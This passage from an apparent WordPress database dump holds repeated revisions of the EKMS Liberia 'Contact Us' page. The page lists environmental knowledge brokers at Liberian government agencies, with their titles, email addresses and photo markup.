Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:48:32','2021-03-25 08:48:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3631,42,'2021-03-25 08:48:32','2021-03-25 08:48:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:48:32','2021-03-25 08:48:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3633,42,'2021-03-29 09:13:51','2021-03-29 09:13:51','','jwiagbe','','inherit','open','closed','','jwiagbe','','','2021-03-29 09:13:51','2021-03-29 09:13:51','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png',0,'attachment','image/png',0),(3635,42,'2021-03-29 09:18:45','2021-03-29 09:18:45','','reeves','','inherit','open','closed','','reeves','','','2021-03-29 09:18:45','2021-03-29 09:18:45','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png',0,'attachment','image/png',0),(3636,42,'2021-03-29 09:20:25','2021-03-29 09:20:25','','willabo','','inherit','open','closed','','willabo','','','2021-03-29 09:20:25','2021-03-29 09:20:25','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png',0,'attachment','image/png',0),(3637,42,'2021-03-29 09:24:05','2021-03-29 09:24:05','','kullie','','inherit','open','closed','','kullie','','','2021-03-29 09:24:05','2021-03-29 09:24:05','',80,'https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png',0,'attachment','image/png',0),(3638,42,'2021-03-29 09:25:31','2021-03-29 09:25:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" 